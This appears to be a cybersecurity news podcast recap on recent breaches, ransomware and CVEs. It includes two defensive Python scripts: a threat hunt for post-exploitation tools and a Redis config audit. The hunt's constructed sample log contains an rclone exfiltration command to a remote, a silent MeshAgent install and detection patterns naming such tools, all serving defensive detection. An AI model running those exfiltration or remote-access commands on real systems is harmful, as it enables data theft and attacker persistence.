Good Morning Security Gang!
A jam-packed show filled with global cyber headlines and a quick moment of remembrance on this solemn date — the second anniversary of the October 7th Hamas attacks. I took a few minutes this morning to reflect on that tragedy and the innocent lives lost before diving into today’s cyber updates.
From Discord’s third-party breach and Red Hat’s ongoing extortion saga to Asahi Beer’s ransomware recovery and Jaguar Land Rover’s partial restart, there’s a lot happening in the world of security. So, espresso in hand — let’s get right into it.
💬 Discord Breach via Third-Party Vendor
Discord confirmed that one of its third-party customer support providers was compromised, exposing data on users who had interacted with its Trust and Safety or Support teams. The stolen data includes names, email addresses, IP addresses, limited billing details, and the message threads between users and support agents. For users who went through age-verification appeals, images of government-issued IDs may have been taken as well. Discord says no passwords, full payment card numbers, or messages outside those support conversations were accessed, but the breach underscores how attractive vendor ticketing platforms are: they hold exactly the identity documents and account context that users would never hand to a stranger. The incident appears unrelated to the broader Salesforce extortion campaign, despite online speculation.
🧠 Red Hat Extortion by ShinyHunters
Red Hat’s GitLab breach continues to escalate. The threat actors now claim to have stolen 570GB of data spanning 28,000 repositories, including roughly 800 customer engagement reports, and the group calling itself the Crimson Collective, working with ShinyHunters, has turned the incident into an “extortion-as-a-service” play. They are threatening to leak the data publicly by October 10th if demands aren’t met, and the samples posted so far include customer engagement reports from major brands. Red Hat maintains the intrusion was limited to a GitLab instance used by its consulting business, but the volume of data the attackers are claiming suggests that the blast radius extends to every customer whose environment details were documented there.
🍺 Asahi Beer Ransomware: Data Stolen, Operations Restored
Japan’s Asahi Group Holdings, one of the world’s largest beverage makers, confirmed that last week’s ransomware attack disrupted operations across its Japanese plants but that production has resumed. The company admitted that data was stolen during the breach but credited its business continuity plan for minimizing downtime. By reverting to manual order processing and “pen-and-paper” operations, Asahi was able to keep shipments moving. I praised their quick recovery on the show, noting,
“You can tell when a company has a mature program — they’re back up in a week while others stay down for months.”
🚗 Jaguar Land Rover Begins Recovery
Jaguar Land Rover (JLR) has begun a phased restart of its production facilities, starting with the Wolverhampton engine plant. The ransomware attack that began on September 1st left manufacturing frozen across multiple continents, with suppliers on the brink of insolvency. The UK government’s £1.5B ($2B) loan guarantee ensures suppliers can stay afloat while operations resume. Analysts warn this event could reshape how governments approach industrial cyber risk, treating such incidents as economic security events, not just IT problems.
💾 Medusa Exploits Fortra GoAnywhere
Microsoft confirmed that a Medusa ransomware affiliate has been exploiting a Fortra GoAnywhere MFT vulnerability (CVE-2025-10035), a deserialization flaw in the product’s License Servlet, for nearly a month, with exploitation predating Fortra’s September fix. The flaw allows unauthenticated remote code execution on the MFT server. Once inside, the attackers drop legitimate remote management tools such as MeshAgent and SimpleHelp for persistence and use Rclone to move data out. Patches were released in September (GoAnywhere MFT 7.8.4 and Sustain Release 7.6.3), but over 500 vulnerable systems remain exposed online. Microsoft recommends auditing for Rclone and MSTSC.EXE usage, looking for unexpected child processes of the GoAnywhere service, and hunting for indicators tied to the Medusa affiliate network.
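The hunt Microsoft describes comes down to finding the handful of tools named above in process-creation telemetry and asking what spawned them. The following is an added example, not Microsoft’s, Fortra’s, or the show’s code: it scans a few constructed process-creation records (the pipe-separated timestamp|host|user|parent_image|image|command_line layout is an assumed flattening of Sysmon Event ID 1 fields, not a real export format) for rclone, mstsc.exe, MeshAgent and SimpleHelp, rates rclone higher when its command line names a configured remote, and treats anything spawned directly by the GoAnywhere Java process as the worst signal of all. The GoAnywhere install path used for that last check is an assumption about a default Windows install.

```python
"""Hunt for the post-exploitation tooling named in the Medusa/GoAnywhere
reporting (rclone, mstsc.exe, MeshAgent, SimpleHelp) in process-creation
telemetry.

Added example, not code from Microsoft, Fortra or the show. SAMPLE_LOG is
constructed; its layout timestamp|host|user|parent_image|image|command_line
is an assumed flattening of Sysmon Event ID 1 fields.
"""
import re
from dataclasses import dataclass

SAMPLE_LOG = r"""
2025-09-12T03:14:07Z|MFT01|NT AUTHORITY\SYSTEM|C:\Program Files\Fortra\GoAnywhere\jre\bin\java.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami
2025-09-12T03:15:22Z|MFT01|NT AUTHORITY\SYSTEM|C:\Windows\System32\cmd.exe|C:\Users\Public\rclone.exe|rclone.exe copy D:\MFT\data remote:exfil --config C:\Users\Public\rc.conf -P
2025-09-12T03:20:41Z|MFT01|NT AUTHORITY\SYSTEM|C:\Windows\System32\cmd.exe|C:\Windows\System32\msiexec.exe|msiexec /i C:\Users\Public\MeshAgent.msi /qn
2025-09-12T09:02:13Z|WS-042|CORP\jdoe|C:\Windows\explorer.exe|C:\Windows\System32\mstsc.exe|mstsc.exe /v:fileserver01
2025-09-12T09:10:55Z|WS-042|CORP\jdoe|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|WINWORD.EXE /n
2025-09-13T01:44:09Z|MFT01|NT AUTHORITY\SYSTEM|C:\Windows\System32\cmd.exe|C:\Users\Public\SimpleHelp-Remote-Access.exe|SimpleHelp-Remote-Access.exe /install
"""


@dataclass
class Finding:
    timestamp: str
    host: str
    rule: str
    severity: str
    command_line: str


# Tools named in the reporting, matched case-insensitively against image path
# plus command line so that an installer (MeshAgent.msi) is caught as well as
# the running binary. The "JWrapper-Remote Access" name is how the SimpleHelp
# agent is commonly packaged on Windows (assumption about vendor packaging).
INDICATORS = {
    "rclone": re.compile(r"(^|[\\/])rclone(\.exe)?\b", re.I),
    "mstsc": re.compile(r"(^|[\\/])mstsc\.exe\b", re.I),
    "meshagent": re.compile(r"meshagent", re.I),
    "simplehelp": re.compile(r"simplehelp|jwrapper-remote access", re.I),
}

# A child process of the MFT's own Java runtime is the shape an RCE leaves
# behind. The path fragment assumes a default Windows install of GoAnywhere.
GOANYWHERE_PARENT = re.compile(r"[\\/]goanywhere[\\/].*java(w)?\.exe$", re.I)

# rclone destinations look like "<remote>:<path>"; a Windows drive letter
# followed by a backslash is deliberately excluded.
RCLONE_REMOTE = re.compile(r"(?<!\w)(?![A-Za-z]:\\)[A-Za-z0-9_-]+:[^\s]*")


def parse(log_text):
    """Split the constructed pipe-separated records into dicts."""
    records = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, user, parent, image, cmd = line.split("|", 5)
        records.append({"ts": ts, "host": host, "user": user,
                        "parent": parent, "image": image, "cmd": cmd})
    return records


def hunt(log_text, approved_rmm=()):
    """Return findings for every record that matches an indicator.

    approved_rmm lists indicator names (e.g. "simplehelp") that are sanctioned
    in your environment and should not be raised.
    """
    findings = []
    for rec in parse(log_text):
        haystack = rec["image"] + " " + rec["cmd"]
        for name, pattern in INDICATORS.items():
            if name in approved_rmm or not pattern.search(haystack):
                continue
            if name == "rclone":
                # rclone pointed at a configured remote is exfiltration until proven otherwise
                severity = "high" if RCLONE_REMOTE.search(rec["cmd"]) else "medium"
            elif name == "mstsc":
                # interactive RDP is routine on workstations; review source and target instead of alerting
                severity = "low"
            else:
                severity = "high"  # unsanctioned RMM agent
            findings.append(Finding(rec["ts"], rec["host"], name, severity, rec["cmd"]))
        # Real telemetry should walk the whole process tree; this only checks the direct parent.
        if GOANYWHERE_PARENT.search(rec["parent"]):
            findings.append(Finding(rec["ts"], rec["host"], "child-of-goanywhere", "critical", rec["cmd"]))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.severity:8} {f.host:7} {f.rule:20} {f.command_line}")
```

Against the constructed records this raises five findings: the cmd.exe spawned by GoAnywhere’s java.exe (critical), the rclone copy to a remote (high), the MeshAgent installer and the SimpleHelp agent (high), and a routine mstsc session on a workstation (low). Passing approved_rmm=("simplehelp",) drops the one tool you have actually sanctioned, which is the first question any of these hits should prompt.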
💻 Redis Patches 13-Year-Old RCE Flaw
Redis fixed a 13-year-old vulnerability (CVE-2025-49844) in its Lua scripting subsystem that lets any client able to run a Lua script escape the sandbox and execute code on the host. On a properly secured instance that means an authenticated user; on the tens of thousands of instances that accept connections without a password, it means anyone on the internet. More than 330,000 Redis instances are exposed online, with at least 60,000 of them unauthenticated. If patching isn’t possible immediately, Redis advises blocking Lua script execution (the EVAL and EVALSHA commands) through ACLs and fencing instances behind network segmentation so that only application hosts can reach them.
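The three conditions that turn this bug into a headline are independent and all visible in redis.conf: the instance listens on every interface, nobody has to authenticate, and Lua scripting is still reachable. The following added example (not Redis’s code and not from the show) audits a config text for those three conditions and shows the weak and the hardened file side by side. Both config texts are constructed; the checks use only standard redis.conf directives (bind, protected-mode, requirepass, user, rename-command) and the @scripting ACL category.

```python
"""Audit a redis.conf for the exposure pattern behind CVE-2025-49844:
reachable from the network, no authentication, Lua scripting still enabled.

Added example, not code from Redis or the show. WEAK_CONF and HARDENED_CONF
are constructed; the checks rely only on standard redis.conf directives.
"""

WEAK_CONF = """
# constructed: the 'just make it work in a container' config
port 6379
protected-mode no
"""

HARDENED_CONF = """
# constructed: bind to the app network only, require a password for the
# default ACL user and strip the whole @scripting category (EVAL, EVALSHA,
# SCRIPT, FCALL...) from it until the patched build is rolled out.
bind 10.20.30.5
protected-mode yes
port 6379
user default on >S3cret-long-passphrase ~* &* +@all -@scripting
"""

WILDCARDS = {"0.0.0.0", "*", "::", "::*"}


def parse_conf(text):
    """Return (directive, [args]) pairs, skipping blanks and comment lines."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        out.append((parts[0].lower(), parts[1:]))
    return out


def audit(text):
    """Return a list of (code, message) findings; an empty list is a pass."""
    conf = parse_conf(text)
    findings = []

    # 1. Network reach. Redis' protected mode only refuses remote clients when
    #    there is no bind directive AND no password, so it must be modelled
    #    rather than assumed.
    bind_tokens = [t.lstrip("-") for d, a in conf if d == "bind" for t in a]
    wildcard = not bind_tokens or any(t in WILDCARDS for t in bind_tokens)
    protected = not any(d == "protected-mode" and a[:1] == ["no"] for d, a in conf)
    requirepass = any(d == "requirepass" and a and a[0] not in ('""', "''") for d, a in conf)
    acl_pass = any(d == "user" and any(t.startswith((">", "#")) for t in a) for d, a in conf)
    authenticated = requirepass or acl_pass
    protected_active = protected and not any(d == "bind" for d, _ in conf) and not authenticated
    if wildcard and not protected_active:
        findings.append(("exposed", "listens on every interface; bind to a private address and segment it"))

    # 2. Authentication: requirepass, or an ACL user carrying a >plain or #sha256 password.
    if not authenticated:
        findings.append(("no-auth", "no requirepass or ACL password: anyone who can connect can run EVAL"))

    # 3. Lua reachability: -@scripting on the default user, or the legacy
    #    rename-command EVAL "" / EVALSHA "" pair.
    renamed = {a[0].upper() for d, a in conf
               if d == "rename-command" and len(a) == 2 and a[1] in ('""', "''")}
    acl_blocked = any(d == "user" and a[:1] == ["default"] and "-@scripting" in a for d, a in conf)
    if not (acl_blocked or {"EVAL", "EVALSHA"} <= renamed):
        findings.append(("lua-enabled", "EVAL/EVALSHA reachable: add -@scripting to the ACL until patched"))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf) or "OK")
```

The weak file trips all three checks; the hardened one trips none. A stock config with nothing but a port set still fails the authentication and Lua checks but not the exposure check, because protected mode is doing its job, and that is exactly the instance that becomes fully exposed the moment someone adds a bind 0.0.0.0 to make a dashboard work.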
📱 Signal Threatens to Leave EU Over Chat Control
As the EU Council prepares to vote on its Chat Control bill, which would mandate client-side scanning of messages before they are encrypted, Signal president Meredith Whittaker said Signal would leave the EU market rather than comply. She warned that the law effectively creates “mass surveillance infrastructure” that endangers journalists and governments alike, since a scanning hook built for one purpose can be repointed at any content. Germany’s swing vote could determine whether the bill passes or dies.
💰 $4.5M Zero-Day Bounty Competition
Cloud security firm Wiz announced “ZeroDay.Cloud,” a live-stage exploit competition with a $4.5 million prize pool, inviting researchers to demonstrate attacks against AWS, Azure, Google Cloud, NVIDIA toolkits, Kubernetes, and AI frameworks this December in Europe. The largest single prize, $300K, is reserved for hypervisor or AI model breaches. Co-sponsored by the major cloud providers, the competition aims to bring container and AI vulnerabilities into the open on the vendors’ terms, and it is sure to reignite the debate over what a zero-day is worth on the disclosure market versus the grey market.
🧠 James Azar’s CISO Take
Today’s stories show that cyber resilience is the real differentiator. Asahi’s quick recovery stands in sharp contrast to Jaguar Land Rover’s month-long disruption. The difference isn’t luck — it’s preparation, segmentation, and tested continuity plans. Asahi’s manual fallback saved them millions. Meanwhile, JLR’s dependence on IT-driven automation nearly crippled an entire supply chain. If that’s not a wake-up call to OT-heavy industries, I don’t know what is.
The second theme is trust and containment. Discord’s vendor breach and Red Hat’s extortion case highlight how the weakest link is almost always third-party exposure. Whether it’s a ticketing vendor, a source code repository, or a cloud connector, CISOs must bake third-party visibility and access governance into every process. Threat actors no longer need to breach you directly — they’ll hit your partners, suppliers, or customers to get the same data.
✅ Action Items
💬 Audit third-party vendor access, especially ticketing and support platforms.
🧠 Rotate and revoke stale API keys, especially from OAuth-linked apps.
💾 Patch Fortra GoAnywhere and Redis immediately; monitor for RCE activity.
🍺 Test manual business continuity plans — paper processes still matter.
🚗 Use JLR as a board-level case study for OT/IT risk.
📱 Track the EU’s Chat Control vote — implications go far beyond Europe.
🧑‍💻 Review what lives in your GitLab and other source repos: rotate any tokens or customer details committed there and tighten who can read consulting and engagement material.
💰 Consider participating in bounty programs to stress-test your stack.
And that’s a wrap for today’s show, Security Gang — stay alert, stay resilient, and as always, stay cyber safe! ☕👊